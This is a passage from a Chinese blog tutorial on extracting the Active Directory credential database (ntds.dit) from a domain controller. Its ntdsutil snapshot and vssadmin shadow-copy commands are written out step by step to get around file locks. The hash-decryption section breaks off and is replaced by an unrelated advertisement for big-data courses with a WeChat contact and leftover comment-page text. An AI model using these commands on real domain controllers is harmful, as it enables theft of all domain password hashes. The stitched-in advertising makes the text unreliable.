工具使用方法︰在域控制器的命令行环境下输入如下命令,创建一个快照,该快照包含Windows中的所有文件,且在复制文件时不会受到Windows锁定机制的限制。
1.1创建快照
ntdsutil snapshot "activate instance ntds" create quit quit
1.2挂载快照
生成快照后,挂载快照可以使得你能够查看和访问该快照的内容,就像它是一个真实的卷一样。挂载是指将快照映射到现有计算机系统的目录树中。也就是说,它允许你像浏览存储在任何存储设备上的文件和目录一样来查看和操作被保存在快照中的数据。
简单来说,挂载快照就是把快照作为一个虚拟的"硬盘"(或者说"驱动器")连接到系统上。这样,你就可以像访问本地磁盘一样来访问快照中的所有文件,执行必要的操作,甚至可以复制这些文件到其他磁盘上或其他主机上。
ntdsutil snapshot "mount {9368eb6a-631b-4e28-b25b-bc78b4674f49}" quit quit
1.3复制ntds.dit
将快照中的ntds.dit文件提取出来!这样不受限制!
copy C:\$SNAP_202211280955_VOLUMEC$\Windows\NTDS\ntds.dit c:\ntds.dit
快照和复制出来的ntds.dit都在C盘中。
快照中的内容是整个机器全部的内容。
1.4卸载快照
- 卸载快照是指将已经挂载到系统中的快照从目录树中移除的操作。
- 当你挂载一个快照后,它会被映射为一个虚拟的卷,可以通过系统来访问该快照中的文件和目录。当你完成对快照中数据的查看、操作或恢复后,可以选择卸载快照,将其从目录树中移除。
- 卸载快照并不影响快照本身的存在,只是不再让系统能够直接访问快照中的内容。
ntdsutil snapshot "unmount {9368eb6a-631b-4e28-b25b-bc78b4674f49}" quit quit
1.5删除快照
- 删除快照是指彻底删除存储设备上的快照文件。
- 快照通常是作为数据备份、故障恢复或版本控制的手段而存在的。当你不再需要某个特定的快照,或者由于存储空间的限制需要释放快照占用的空间时,可以选择删除快照。
- 删除快照将永久性地从存储设备上删除这些快照文件,并且无法恢复。
ntdsutil snapshot "delete {9368eb6a-631b-4e28-b25b-bc78b4674f49}" quit quit
二、利用vssadmin提取ntds.dit
2.1 创建C盘影卷副本
vssadmin create shadow /for=c:
2.2 Copy出ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\ntds\ntds.dit c:\ntds.dit
2.3 删除快照
vssadmin delete shadows /for=c: /quiet
三、解密并导出Hash
3.1 获取system.hive文件
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数大数据工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年大数据全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上大数据开发知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注大数据获取)
一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
888 (备注大数据获取)**
[外链图片转存中…(img-Kf27AcGa-1713017458851)]
一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
1343
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
